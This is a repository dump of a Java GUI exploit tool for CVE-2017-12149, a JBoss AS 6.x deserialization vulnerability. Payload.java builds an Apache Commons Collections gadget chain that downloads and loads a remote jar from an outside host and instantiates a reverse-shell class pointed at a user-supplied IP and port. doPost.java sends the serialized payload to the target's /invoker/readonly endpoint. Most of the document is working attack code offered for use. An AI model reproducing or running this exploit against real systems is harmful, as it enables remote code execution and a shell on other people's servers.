├── README.md
└── jboss
├── .classpath
├── .project
├── .settings
├── org.eclipse.core.resources.prefs
└── org.eclipse.jdt.core.prefs
├── ReverseShellCommonsCollectionsHashMap.ser
├── bin
└── com
│ └── jboss
│ └── main
│ ├── MainAPP$1.class
│ ├── MainAPP$2.class
│ ├── MainAPP.class
│ ├── Payload.class
│ ├── ReverseShellCommonsCollectionsHashMap.class
│ └── doPost.class
├── lib
├── commons-collections-3.2.1.jar
└── quaqua.jar
└── src
└── com
└── jboss
└── main
├── MainAPP.java
├── Payload.java
└── doPost.java
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-12149
2 | CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
3 | 根据作者命令行模式改写gui界面
4 | detail:http://www.cnblogs.com/sevck/p/7874438.html
5 | 
6 |
--------------------------------------------------------------------------------
/jboss/.classpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/jboss/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | jboss
4 |
5 |
6 |
7 |
8 |
9 | org.eclipse.jdt.core.javabuilder
10 |
11 |
12 |
13 |
14 |
15 | org.eclipse.jdt.core.javanature
16 |
17 |
18 |
--------------------------------------------------------------------------------
/jboss/.settings/org.eclipse.core.resources.prefs:
--------------------------------------------------------------------------------
1 | eclipse.preferences.version=1
2 | encoding//src/com/jboss/main/Payload.java=UTF-8
3 | encoding//src/com/jboss/main/ReverseShellCommonsCollectionsHashMap.java=UTF-8
4 | encoding//src/com/jboss/main/doPost.java=UTF-8
5 | encoding/=UTF-8
6 |
--------------------------------------------------------------------------------
/jboss/.settings/org.eclipse.jdt.core.prefs:
--------------------------------------------------------------------------------
1 | eclipse.preferences.version=1
2 | org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
3 | org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
4 | org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
5 | org.eclipse.jdt.core.compiler.compliance=1.6
6 | org.eclipse.jdt.core.compiler.debug.lineNumber=generate
7 | org.eclipse.jdt.core.compiler.debug.localVariable=generate
8 | org.eclipse.jdt.core.compiler.debug.sourceFile=generate
9 | org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
10 | org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
11 | org.eclipse.jdt.core.compiler.source=1.6
12 |
--------------------------------------------------------------------------------
/jboss/ReverseShellCommonsCollectionsHashMap.ser:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/ReverseShellCommonsCollectionsHashMap.ser
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/MainAPP$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/MainAPP$1.class
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/MainAPP$2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/MainAPP$2.class
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/MainAPP.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/MainAPP.class
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/Payload.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/Payload.class
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/ReverseShellCommonsCollectionsHashMap.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/ReverseShellCommonsCollectionsHashMap.class
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/doPost.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/doPost.class
--------------------------------------------------------------------------------
/jboss/lib/commons-collections-3.2.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/lib/commons-collections-3.2.1.jar
--------------------------------------------------------------------------------
/jboss/lib/quaqua.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/lib/quaqua.jar
--------------------------------------------------------------------------------
/jboss/src/com/jboss/main/MainAPP.java:
--------------------------------------------------------------------------------
1 | package com.jboss.main;
2 |
3 | import java.awt.Container;
4 | import java.awt.Dimension;
5 | import java.awt.FlowLayout;
6 | import java.awt.GridLayout;
7 | import java.awt.event.ActionEvent;
8 | import java.awt.event.ActionListener;
9 | import java.io.DataInputStream;
10 | import java.io.File;
11 | import java.io.FileInputStream;
12 | import java.io.FileOutputStream;
13 | import java.io.IOException;
14 | import java.lang.reflect.InvocationTargetException;
15 | import java.util.ArrayList;
16 | import java.util.List;
17 |
18 | import javax.swing.JButton;
19 | import javax.swing.JFrame;
20 | import javax.swing.JLabel;
21 | import javax.swing.JOptionPane;
22 | import javax.swing.JRootPane;
23 | import javax.swing.JTextArea;
24 | import javax.swing.JTextField;
25 | import javax.swing.UIManager;
26 | import javax.swing.UnsupportedLookAndFeelException;
27 |
28 |
29 | public class MainAPP extends JFrame {
30 | JLabel server_lab = new JLabel("jboss ip/port:");
31 | JTextField server = new JTextField(25);
32 | JLabel local_ip_lab = new JLabel("shell ip/port:");
33 | JTextField local_ip = new JTextField(25);
34 | JButton btn = new JButton("Send");
35 | JButton help = new JButton("Read Me");
36 |
37 | public MainAPP() {
38 | setUndecorated(true);
39 | setDefaultCloseOperation(3);
40 | setFocusableWindowState(true);
41 | JRootPane rp = getRootPane();
42 | setVisible(true);
43 | this.setTitle("CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版) By:Sevck");
44 | this.setSize(560, 230);// 宽度
45 | this.setResizable(false);
46 | this.setLocationRelativeTo(null);
47 | rp.setWindowDecorationStyle(JRootPane.FRAME);
48 | init();
49 | }
50 |
51 | public void init() {
52 | Container cp = this.getContentPane();
53 | this.setLayout(new FlowLayout(FlowLayout.LEFT,20,40));// 布局
54 | cp.add(server_lab);
55 | cp.add(server);
56 | cp.add(btn);
57 | cp.add(local_ip_lab);
58 | cp.add(local_ip);
59 | cp.add(help);
60 | btn.addActionListener(new ActionListener() {
61 |
62 | @Override
63 | public void actionPerformed(ActionEvent e) {
64 | btn_startActionPerformed(e);
65 |
66 | }
67 | });
68 | help.addActionListener(new ActionListener() {
69 |
70 | @Override
71 | public void actionPerformed(ActionEvent e) {
72 | JOptionPane.showMessageDialog(null, "jboss:192.168.197.25:8080\r\nshell:192.168.197.12:1234");
73 |
74 | }
75 | });
76 | }
77 | private void btn_startActionPerformed(ActionEvent evt) {
78 | String jboss_ip = this.server.getText(); // �����IP
79 | String local_ip = this.local_ip.getText(); //����ip/port
80 | if (jboss_ip.equalsIgnoreCase("") || local_ip.equalsIgnoreCase("")){
81 | String msg = "JBoss服务器和反弹IP端口字段不能为空";
82 | JOptionPane.showMessageDialog(null, msg);
83 | return ;
84 | }
85 | String msg = "";
86 | // 生成payload
87 | Payload payload = new Payload();
88 | String result = null;
89 | try {
90 | result = payload.PayloadGeneration(local_ip);
91 | }catch (Exception e) {
92 | JOptionPane.showMessageDialog(null, e.getMessage());
93 | }
94 | String fileName = "ReverseShellCommonsCollectionsHashMap.ser";
95 | String filePath = System.getProperty("user.dir")+"\\ReverseShellCommonsCollectionsHashMap.ser";
96 | System.out.println(filePath);
97 | doPost.DoPost("http://"+jboss_ip+"/invoker/readonly", filePath,fileName);
98 | JOptionPane.showMessageDialog(null, "just do it.");
99 | }
100 |
101 | public static void main(String[] args) {
102 | // LookAndFeel
103 | System.setProperty("Quaqua.tabLayoutPolicy", "wrap");
104 |
105 | try {
106 | UIManager.setLookAndFeel(ch.randelshofer.quaqua.QuaquaManager
107 | .getLookAndFeel());
108 | } catch (UnsupportedLookAndFeelException e) {
109 | // TODO Auto-generated catch block
110 | }
111 | new MainAPP();
112 |
113 |
114 | }
115 |
116 | }
117 |
--------------------------------------------------------------------------------
/jboss/src/com/jboss/main/Payload.java:
--------------------------------------------------------------------------------
1 | package com.jboss.main;
2 | import java.io.FileOutputStream;
3 | import java.io.IOException;
4 | import java.io.ObjectOutputStream;
5 | import java.lang.reflect.Field;
6 | import java.lang.reflect.InvocationTargetException;
7 | import java.net.URL;
8 | import java.net.URLClassLoader;
9 | import java.util.HashMap;
10 | import java.util.HashSet;
11 | import java.util.Map;
12 |
13 | import org.apache.commons.collections.Transformer;
14 | import org.apache.commons.collections.functors.ChainedTransformer;
15 | import org.apache.commons.collections.functors.ConstantTransformer;
16 | import org.apache.commons.collections.functors.InstantiateTransformer;
17 | import org.apache.commons.collections.functors.InvokerTransformer;
18 | import org.apache.commons.collections.keyvalue.TiedMapEntry;
19 | import org.apache.commons.collections.map.LazyMap;
20 |
21 | public class Payload {
22 | @SuppressWarnings ( {"unchecked"} )
23 | public String PayloadGeneration(String info) throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
24 | IllegalAccessException, IllegalArgumentException, InvocationTargetException, IOException, NoSuchFieldException {
25 | String remoteJar = "http://scan.javasec.cn/java/JexRemoteTools.jar";
26 | String host = null;
27 | int port = 1331;
28 | String msg = null;
29 |
30 | // Verifica se o usuário forneceu o comando a ser executado
31 | if (info.equalsIgnoreCase("") ) {
32 | msg = "Invalid params! \n" +
33 | "Example usage: java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap \"REMOTE_IP:PORT\"";
34 | FileOutputStream fos = null;
35 | return msg;
36 | }
37 | host = info.split(":")[0];
38 | port = Integer.parseInt(info.split(":")[1]);
39 |
40 | Transformer[] transformers = new Transformer[] {
41 |
42 | new ConstantTransformer(URLClassLoader.class),
43 | new InstantiateTransformer(
44 | new Class[]{
45 | URL[].class
46 | },
47 | new Object[]{
48 | new URL[]{new URL(remoteJar)}
49 | }),
50 | new InvokerTransformer("loadClass",
51 | new Class[]{
52 | String.class
53 | },
54 | new Object[]{
55 | "JexReverse"
56 | }),
57 | new InstantiateTransformer(
58 | new Class[]{ String.class, int.class },
59 | new Object[]{ host, port }
60 | )
61 | };
62 |
63 | // Cria o objeto ChainedTransformer com o array de Transformers:
64 | Transformer transformerChain = new ChainedTransformer(transformers);
65 | // Cria o map
66 | Map map1 = new HashMap();
67 | // Decora o map com o LazyMap e a cadeia de transformações como factory
68 | Map lazyMap = LazyMap.decorate(map1,transformerChain);
69 |
70 | TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
71 |
72 | HashSet map = new HashSet(1);
73 | map.add("foo");
74 | Field f = null;
75 | try {
76 | f = HashSet.class.getDeclaredField("map");
77 | } catch (NoSuchFieldException e) {
78 | f = HashSet.class.getDeclaredField("backingMap");
79 | }
80 |
81 | f.setAccessible(true);
82 | HashMap innimpl = (HashMap) f.get(map);
83 |
84 | Field f2 = null;
85 | try {
86 | f2 = HashMap.class.getDeclaredField("table");
87 | } catch (NoSuchFieldException e) {
88 | f2 = HashMap.class.getDeclaredField("elementData");
89 | }
90 |
91 | f2.setAccessible(true);
92 | Object[] array = (Object[]) f2.get(innimpl);
93 |
94 | Object node = array[0];
95 | if(node == null){
96 | node = array[1];
97 | }
98 |
99 | Field keyField = null;
100 | try{
101 | keyField = node.getClass().getDeclaredField("key");
102 | }catch(Exception e){
103 | keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
104 | }
105 |
106 | keyField.setAccessible(true);
107 | keyField.set(node, entry);
108 |
109 | // Serializa o objeto
110 | System.out.println("Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser");
111 | FileOutputStream fos = new FileOutputStream("ReverseShellCommonsCollectionsHashMap.ser");
112 | ObjectOutputStream oos = new ObjectOutputStream(fos);
113 | oos.writeObject(map);
114 | oos.flush();
115 | msg = "payload generation success.";
116 | return msg;
117 | }
118 | }
119 |
--------------------------------------------------------------------------------
/jboss/src/com/jboss/main/doPost.java:
--------------------------------------------------------------------------------
1 | package com.jboss.main;
2 |
3 | import java.io.BufferedOutputStream;
4 | import java.io.BufferedReader;
5 | import java.io.DataInputStream;
6 | import java.io.DataOutputStream;
7 | import java.io.File;
8 | import java.io.FileInputStream;
9 | import java.io.FileOutputStream;
10 | import java.io.InputStreamReader;
11 | import java.net.HttpURLConnection;
12 | import java.net.URL;
13 | import java.net.URLConnection;
14 |
15 | public class doPost {
16 |
17 | public static void DoPost(String url,String filePath,String fileName){
18 | try {
19 | URL realUrl = new URL(url);
20 |
21 | HttpURLConnection conn = (HttpURLConnection) realUrl.openConnection();
22 |
23 | conn.setDoInput(true);
24 | conn.setDoOutput(true);
25 | conn.setRequestMethod("POST");
26 | conn.addRequestProperty("FileName", fileName);
27 | conn.setRequestProperty("accept", "*/*");
28 | conn.setRequestProperty("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)");
29 | conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
30 | BufferedOutputStream out=new BufferedOutputStream(conn.getOutputStream());
31 | //读取文件路径
32 | File file=new File(filePath);
33 | FileInputStream fileInputStream=new FileInputStream(file);
34 | byte[]bytes=new byte[1024];
35 | int numReadByte=0;
36 | while((numReadByte=fileInputStream.read(bytes,0,1024))>0){
37 | out.write(bytes, 0, numReadByte);
38 | }
39 | out.flush();
40 | fileInputStream.close();
41 | //写入数据
42 | DataInputStream in=new DataInputStream(conn.getInputStream());
43 | } catch (Exception e) {
44 | System.out.println("异常," + e.getMessage());
45 | // e.printStackTrace();
46 | }
47 | }
48 | }
49 |
--------------------------------------------------------------------------------